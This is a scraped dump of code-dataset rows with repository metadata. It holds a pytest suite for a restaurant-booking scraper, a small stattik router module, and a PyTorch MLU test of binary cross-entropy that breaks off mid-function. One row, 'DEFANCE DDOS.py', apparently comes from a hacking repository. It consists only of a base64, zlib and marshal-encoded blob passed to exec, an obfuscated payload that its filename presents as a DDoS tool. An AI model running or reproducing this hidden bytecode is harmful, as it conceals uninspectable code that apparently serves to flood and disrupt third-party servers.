] | 25 | 2022-03-02T19:04:43.000Z | 2022-03-08T03:39:25.000Z | backend/scraper/scraper_tests.py | cs130-w22/Group-A7 | 26172fa9c0b2a18fde0f569ab34e85927d941ba6 | [
"Apache-2.0"
] | null | null | null | import pytest
from main import Scraper
def test_invalid_city():
s = Scraper()
s.scrape_restaurant_info("fake_city", "2022-03-15", "2")
assert s.get_restaurant_times() == {}
assert s.get_restaurant_hyperlinks() == {}
assert s.get_restaurant_tags() == {}
def test_invalid_date():
s = Scraper()
s.scrape_restaurant_info("Chicago", "1000-00-00", "2")
assert s.get_restaurant_times() == {}
assert s.get_restaurant_hyperlinks() == {}
assert s.get_restaurant_tags() == {}
def test_invalid_seats():
s = Scraper()
s.scrape_restaurant_info("Chicago", "2022-03-15", "-1")
assert s.get_restaurant_times() == {}
assert s.get_restaurant_hyperlinks() == {}
assert s.get_restaurant_tags() == {}
def test_invalid_time():
s = Scraper()
s.scrape_restaurant_info("Chicago", "2022-03-15", "2", hhtime=-1)
assert s.get_restaurant_times() == {}
assert s.get_restaurant_hyperlinks() == {}
assert s.get_restaurant_tags() == {}
def test_invalid_cuisine():
s = Scraper()
s.scrape_restaurant_info("Chicago", "2022-03-15", "2", hhtime=14, cuisine="xyz")
assert s.get_restaurant_times() == {}
assert s.get_restaurant_hyperlinks() == {}
assert s.get_restaurant_tags() == {}
def test_valid_required_parameters():
s = Scraper()
s.scrape_restaurant_info("Chicago", "2022-03-15", "2") # these parameters will not succeed after the given date
times = s.get_restaurant_times()
assert len(times) > 0
for k in times.keys():
for time in times[k]:
assert "PM" in time or "AM" in time
hrefs = s.get_restaurant_hyperlinks()
b_url = "https://www.exploretock.com"
assert len(hrefs) > 0
for k in hrefs.keys():
assert len(hrefs[k]) > len(b_url) and "https://" in hrefs[k]
tags = s.get_restaurant_tags()
assert len(tags) > 0 # tags very heavily between restaurants so there is not much else to test here
def test_valid_with_optional_parameters():
s = Scraper()
s.scrape_restaurant_info("Chicago", "2022-03-15", "2", hhtime=18, cuisine="american")
times = s.get_restaurant_times()
assert len(times) > 0
for k in times.keys():
for time in times[k]:
assert "PM" in time or "AM" in time
hrefs = s.get_restaurant_hyperlinks()
b_url = "https://www.exploretock.com"
assert len(hrefs) > 0
for k in hrefs.keys():
assert len(hrefs[k]) > len(b_url) and "https://" in hrefs[k]
tags = s.get_restaurant_tags()
assert len(tags) > 0
def test_valid_diff_city_name():
s = Scraper()
s.scrape_restaurant_info("Atlanta", "2022-03-15", "2")
times = s.get_restaurant_times()
assert len(times) > 0
for k in times.keys():
for time in times[k]:
assert "PM" in time or "AM" in time
hrefs = s.get_restaurant_hyperlinks()
b_url = "https://www.exploretock.com"
assert len(hrefs) > 0
for k in hrefs.keys():
assert len(hrefs[k]) > len(b_url) and "https://" in hrefs[k]
tags = s.get_restaurant_tags()
assert len(tags) > 0
def test_valid_lowercase_city_name():
s = Scraper()
s.scrape_restaurant_info("atlanta", "2022-03-15", "2")
times = s.get_restaurant_times()
assert len(times) > 0
for k in times.keys():
for time in times[k]:
assert "PM" in time or "AM" in time
hrefs = s.get_restaurant_hyperlinks()
b_url = "https://www.exploretock.com"
assert len(hrefs) > 0
for k in hrefs.keys():
assert len(hrefs[k]) > len(b_url) and "https://" in hrefs[k]
tags = s.get_restaurant_tags()
assert len(tags) > 0
def test_valid_spaced_city_name():
s = Scraper()
s.scrape_restaurant_info("Los Angeles", "2022-03-15", "2")
times = s.get_restaurant_times()
assert len(times) > 0
for k in times.keys():
for time in times[k]:
assert "PM" in time or "AM" in time
hrefs = s.get_restaurant_hyperlinks()
b_url = "https://www.exploretock.com"
assert len(hrefs) > 0
for k in hrefs.keys():
assert len(hrefs[k]) > len(b_url) and "https://" in hrefs[k]
tags = s.get_restaurant_tags()
assert len(tags) > 0 | 32.379845 | 115 | 0.635863 | 615 | 4,177 | 4.123577 | 0.134959 | 0.047319 | 0.165615 | 0.118297 | 0.882098 | 0.882098 | 0.870662 | 0.856467 | 0.841877 | 0.841877 | 0 | 0.033753 | 0.219775 | 4,177 | 129 | 116 | 32.379845 | 0.7444 | 0.031362 | 0 | 0.794393 | 0 | 0 | 0.097181 | 0 | 0 | 0 | 0 | 0 | 0.373832 | 1 | 0.093458 | false | 0 | 0.018692 | 0 | 0.11215 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9ebb531298631ca444d4a673b24fdc4e27d1f7f5 | 7,037 | py | Python | DEFANCE DDOS.py | Sahrul-Gunawan-Cyber/LiteDefance | aeabf0016eea546902e5904fdbdcbef09300c60f | [
"Apache-2.0"
] | null | null | null | DEFANCE DDOS.py | Sahrul-Gunawan-Cyber/LiteDefance | aeabf0016eea546902e5904fdbdcbef09300c60f | [
"Apache-2.0"
] | null | null | null | DEFANCE DDOS.py | Sahrul-Gunawan-Cyber/LiteDefance | aeabf0016eea546902e5904fdbdcbef09300c60f | [
"Apache-2.0"
] | null | null | null | import marshal,zlib,base64
exec(marshal.loads(zlib.decompress(base64.b64decode("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")))) | 3,518.5 | 7,010 | 0.967458 | 219 | 7,037 | 31.086758 | 0.954338 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.147832 | 0.000284 | 7,037 | 2 | 7,010 | 3,518.5 | 0.819901 | 0 | 0 | 0 | 0 | 0.5 | 0.987781 | 0.987781 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 10 |
7b4a703d1c291c1fdc8406c05759de52c6cc6b53 | 149 | py | Python | packages/stattik/tests/src/router/__init__.py | stattikcms/stattik | 5c96d600d105461edb95a11d8050dee3c32edd1e | [
"MIT"
] | 1 | 2021-11-05T06:24:28.000Z | 2021-11-05T06:24:28.000Z | packages/stattik/tests/src/router/__init__.py | stattikcms/stattik | 5c96d600d105461edb95a11d8050dee3c32edd1e | [
"MIT"
] | null | null | null | packages/stattik/tests/src/router/__init__.py | stattikcms/stattik | 5c96d600d105461edb95a11d8050dee3c32edd1e | [
"MIT"
] | null | null | null | from loguru import logger
import stattik.routing
from .routes import routes
def create_router():
return stattik.routing.create_router(routes)
| 16.555556 | 48 | 0.798658 | 20 | 149 | 5.85 | 0.55 | 0.239316 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.14094 | 149 | 8 | 49 | 18.625 | 0.914063 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | true | 0 | 0.6 | 0.2 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
7b6d52aeccb7526f2c699cfb4ded1f2eaa537f66 | 13,114 | py | Python | test/cnnl/op_test/test_bce.py | Cambricon/catch | 2625da389f25a67066d20fb6b0c38250ef98f8ab | [
"BSD-2-Clause"
] | 20 | 2022-03-01T11:40:51.000Z | 2022-03-30T08:17:47.000Z | test/cnnl/op_test/test_bce.py | Cambricon/catch | 2625da389f25a67066d20fb6b0c38250ef98f8ab | [
"BSD-2-Clause"
] | null | null | null | test/cnnl/op_test/test_bce.py | Cambricon/catch | 2625da389f25a67066d20fb6b0c38250ef98f8ab | [
"BSD-2-Clause"
] | null | null | null | from __future__ import print_function
import sys
import os
os.environ['ENABLE_CNNL_TRYCATCH'] = 'OFF' # pylint: disable=all
import copy
from itertools import product
import unittest
import logging
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch_mlu.core.mlu_model as ct
cur_dir = os.path.dirname(os.path.abspath(__file__))
sys.path.append(cur_dir + "/../../")
from common_utils import testinfo, TestCase # pylint: disable=C0411, C0413
logging.basicConfig(level=logging.DEBUG)
class TestBceOps(TestCase):
# TODO(guyi):issue:303 (fixme) # pylint: disable=W0511
# 1)pytorch1.6 logic is different with 1.3
# and some boundary values can't be passed
# 2)here logic doesn't add offset value, later will fix
# @unittest.skip("not test")
@testinfo()
def test_bce(self):
shape_list = [(156), (2, 4, 6, 8), (527, 80), (32, 3, 14, 26)]
reduct_lst = ["none", "mean", "sum"]
# bce_loss python interface don't support short/half
dtype_list = [(torch.float, 3e-3)]
weight_flag_list = [True, False]
for shape, reduct, type_err, weight_flag in product(shape_list, reduct_lst, dtype_list, weight_flag_list):
x = torch.rand(shape, dtype=torch.float).to(type_err[0])
target = torch.rand(shape, dtype=torch.float).to(type_err[0])
weight_orig = torch.rand(shape, dtype=torch.float).to(type_err[0])
if weight_flag:
weight_ = weight_orig
weight_mlu = weight_orig.to("mlu")
else:
weight_ = None
weight_mlu = None
loss = nn.BCELoss(weight=weight_ if weight_flag else None, reduction=reduct)
loss_mlu = nn.BCELoss(weight=weight_mlu if weight_flag else None,
reduction=reduct)
out_cpu = loss(x, target)
out_mlu = loss_mlu(x.to("mlu"), target.to("mlu"))
try:
self.assertTensorsEqual(out_cpu.float(), out_mlu.cpu().float(),
type_err[1], use_MSE=True)
except AssertionError as e:
print(e)
# @unittest.skip("not test")
@testinfo()
def test_bce_not_dense(self):
shape_list = [(2, 4, 6, 8), (527, 80), (32, 3, 14, 26)]
reduct_lst = ["none", "mean", "sum"]
# bce_loss python interface don't support short/half
dtype_list = [(torch.float, 3e-3)]
weight_flag_list = [True, False]
for shape, reduct, type_err, weight_flag in product(shape_list, reduct_lst, dtype_list, weight_flag_list):
x = torch.rand(shape, dtype=torch.float).to(type_err[0])
target = torch.rand(shape, dtype=torch.float).to(type_err[0])
weight_orig = torch.rand(shape, dtype=torch.float).to(type_err[0])
if weight_flag:
weight_cpu = weight_orig[...,:int(shape[-1]/2)]
weight_mlu = weight_orig.to("mlu")[...,:int(shape[-1]/2)]
else:
weight_cpu = None
weight_mlu = None
x_cpu = x[...,:int(shape[-1]/2)]
x_mlu = x.to('mlu')[...,:int(shape[-1]/2)]
target_cpu = target[...,:int(shape[-1]/2)]
target_mlu = target.to('mlu')[...,:int(shape[-1]/2)]
loss_cpu = nn.BCELoss(weight=weight_cpu if weight_flag else None, reduction=reduct)
loss_mlu = nn.BCELoss(weight=weight_mlu if weight_flag else None,
reduction=reduct)
out_cpu = loss_cpu(x_cpu, target_cpu)
out_mlu = loss_mlu(x_mlu, target_mlu)
try:
self.assertTensorsEqual(out_cpu.float(), out_mlu.cpu().float(),
type_err[1], use_MSE=True)
except AssertionError as e:
print(e)
# @unittest.skip("not test")
@testinfo()
def test_bce_channel_last(self):
shape_list = [(2, 4, 6, 8),(32, 3, 14, 26)]
reduct_lst = ["none", "mean", "sum"]
# bce_loss python interface don't support short/half
dtype_list = [(torch.float, 3e-3)]
weight_flag_list = [True, False]
for shape, reduct, type_err, weight_flag in product(shape_list, reduct_lst, dtype_list, weight_flag_list):
x = torch.rand(shape, dtype=torch.float).to(type_err[0])
target = torch.rand(shape, dtype=torch.float).to(type_err[0])
weight_orig = torch.rand(shape, dtype=torch.float).to(type_err[0])
if weight_flag:
weight_cpu = weight_orig
weight_mlu = weight_orig.to("mlu")
else:
weight_cpu = None
weight_mlu = None
x_cpu = x.to(memory_format=torch.channels_last)
x_mlu = x.to('mlu').to(memory_format=torch.channels_last)
target_cpu = target
target_mlu = target.to('mlu')
loss_cpu = nn.BCELoss(weight=weight_cpu if weight_flag else None, reduction=reduct)
loss_mlu = nn.BCELoss(weight=weight_mlu if weight_flag else None,
reduction=reduct)
out_cpu = loss_cpu(x_cpu, target_cpu)
out_mlu = loss_mlu(x_mlu, target_mlu)
try:
self.assertTensorsEqual(out_cpu.float(), out_mlu.cpu().float(),
type_err[1], use_MSE=True)
except AssertionError as e:
print(e)
# @unittest.skip("not test")
@testinfo()
def test_bce_bp(self):
shape_list = [(156), (2, 4, 6, 8), (527, 80), (32, 3, 14, 26)]
reduct_lst = ["none", "mean", "sum"]
dtype_list = [(torch.float, 3e-3)]
weight_flag_list = [True, False]
for shape, reduct, type_err, weight_flag in product(shape_list, reduct_lst, dtype_list, weight_flag_list):
x = torch.rand(shape, dtype=torch.float, requires_grad=True).to(type_err[0])
target = torch.rand(shape, dtype=torch.float).to(type_err[0])
weight = torch.rand(shape, dtype=torch.float).to(type_err[0])
grad_in = torch.rand(shape, dtype=torch.float).to(type_err[0])
grad_in_mlu = grad_in.to("mlu")
if weight_flag:
weight_ = weight
weight_mlu = weight.to("mlu")
else:
weight_ = None
weight_mlu = None
out_cpu = F.binary_cross_entropy(x, target, reduction=reduct,
weight=weight_)
if reduct == "none":
out_cpu.backward(grad_in)
else:
out_cpu.backward()
grad_cpu = copy.deepcopy(x.grad)
x.grad.zero_()
out_mlu = F.binary_cross_entropy(x.to("mlu"), target.to("mlu"),
reduction=reduct,
weight=weight_mlu)
if reduct == "none":
out_mlu.backward(grad_in_mlu)
else:
out_mlu.backward()
grad_mlu = copy.deepcopy(x.grad)
x.grad.zero_()
self.assertTensorsEqual(out_cpu.float(), out_mlu.cpu().float(),
type_err[1], use_MSE=True)
self.assertTensorsEqual(grad_cpu.float(), grad_mlu.cpu().float(),
type_err[1], use_MSE=True)
# @unittest.skip("not test")
@testinfo()
def test_bce_bp_not_dense(self):
shape_list = [(2, 4, 6, 8), (527, 80), (32, 3, 14, 26)]
reduct_lst = ["none", "mean", "sum"]
dtype_list = [(torch.float, 3e-3)]
weight_flag_list = [True, False]
for shape, reduct, type_err, weight_flag in product(shape_list, reduct_lst, dtype_list, weight_flag_list):
x = torch.rand(shape, dtype=torch.float).to(type_err[0])
target = torch.rand(shape, dtype=torch.float).to(type_err[0])
weight = torch.rand(shape, dtype=torch.float).to(type_err[0])
grad_in = torch.rand(shape, dtype=torch.float).to(type_err[0])[...,:int(shape[-1]/2)]
grad_in_mlu = grad_in.to("mlu")[...,:int(shape[-1]/2)]
if weight_flag:
weight_cpu = weight[...,:int(shape[-1]/2)]
weight_mlu = weight.to("mlu")[...,:int(shape[-1]/2)]
else:
weight_cpu = None
weight_mlu = None
x_cpu = x[...,:int(shape[-1]/2)].requires_grad_()
x_mlu = x.to('mlu')[...,:int(shape[-1]/2)].requires_grad_()
target_cpu = target[...,:int(shape[-1]/2)]
target_mlu = target.to("mlu")[...,:int(shape[-1]/2)]
out_cpu = F.binary_cross_entropy(x_cpu, target_cpu, reduction=reduct,
weight=weight_cpu)
if reduct == "none":
out_cpu.backward(grad_in)
else:
out_cpu.backward()
grad_cpu = copy.deepcopy(x_cpu.grad)
x_cpu.grad.zero_()
out_mlu = F.binary_cross_entropy(x_mlu, target_mlu,
reduction=reduct,
weight=weight_mlu)
if reduct == "none":
out_mlu.backward(grad_in_mlu)
else:
out_mlu.backward()
grad_mlu = copy.deepcopy(x_mlu.grad)
x_mlu.grad.zero_()
self.assertTensorsEqual(out_cpu.float(), out_mlu.cpu().float(),
type_err[1], use_MSE=True)
self.assertTensorsEqual(grad_cpu.float(), grad_mlu.cpu().float(),
type_err[1], use_MSE=True)
# @unittest.skip("not test")
@testinfo()
def test_bce_bp_channel_last(self):
shape_list = [(2, 4, 6, 8), (32, 3, 14, 26)]
reduct_lst = ["none", "mean", "sum"]
dtype_list = [(torch.float, 3e-3)]
weight_flag_list = [True, False]
for shape, reduct, type_err, weight_flag in product(shape_list, reduct_lst, dtype_list, weight_flag_list):
x = torch.rand(shape, dtype=torch.float).to(type_err[0])
target = torch.rand(shape, dtype=torch.float).to(type_err[0])
weight = torch.rand(shape, dtype=torch.float).to(type_err[0])
grad_in = torch.rand(shape, dtype=torch.float).to(type_err[0])
grad_in_mlu = grad_in.to("mlu")
if weight_flag:
weight_cpu = weight
weight_mlu = weight.to("mlu")
else:
weight_cpu = None
weight_mlu = None
x_cpu = x.to(memory_format=torch.channels_last).requires_grad_()
x_mlu = x.to('mlu').to(memory_format=torch.channels_last).requires_grad_()
# import pdb;pdb.set_trace()
target_cpu = target
target_mlu = target.to("mlu")
